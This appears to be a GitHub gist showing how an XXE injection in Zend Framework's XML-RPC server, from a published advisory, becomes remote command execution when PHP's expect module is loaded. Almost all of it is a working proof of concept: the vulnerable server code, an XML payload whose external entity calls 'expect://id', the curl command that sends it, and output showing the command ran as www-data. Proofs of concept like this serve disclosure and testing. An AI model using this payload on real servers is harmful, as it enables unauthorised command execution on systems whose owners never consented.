-
-
Save r3k2/1f6f4afc2de1006de4e56e6e9a7d4b20 to your computer and use it in GitHub Desktop.
XXE to RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt | |
| into a Remote Command Execution: | |
| NOTE: It relies on the PHP expect module being loaded | |
| (see http://de.php.net/manual/en/book.expect.php) | |
| joern@vbox-1:/tmp$ cat /var/www/server.php | |
| <? | |
| require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php"); | |
| Zend_Loader_Autoloader::getInstance(); | |
| $server = new Zend_XmlRpc_Server(); | |
| echo $server->handle(); | |
| ?> | |
| joern@vbox-1:/tmp$ cat payload | |
| <!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]> | |
| <methodCall> | |
| <methodName>&foo;</methodName> | |
| </methodCall> | |
| joern@vbox-1:/tmp$ curl http://localhost/server.php -d @payload | |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <methodResponse> | |
| <fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value> | |
| <string>Method "uid=33(www-data) gid=33(www-data) groups=33(www-data) | |
| " does not exist</string> | |
| </value></member></struct></value></fault></methodResponse>joern@vbox-1:/tmp$ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment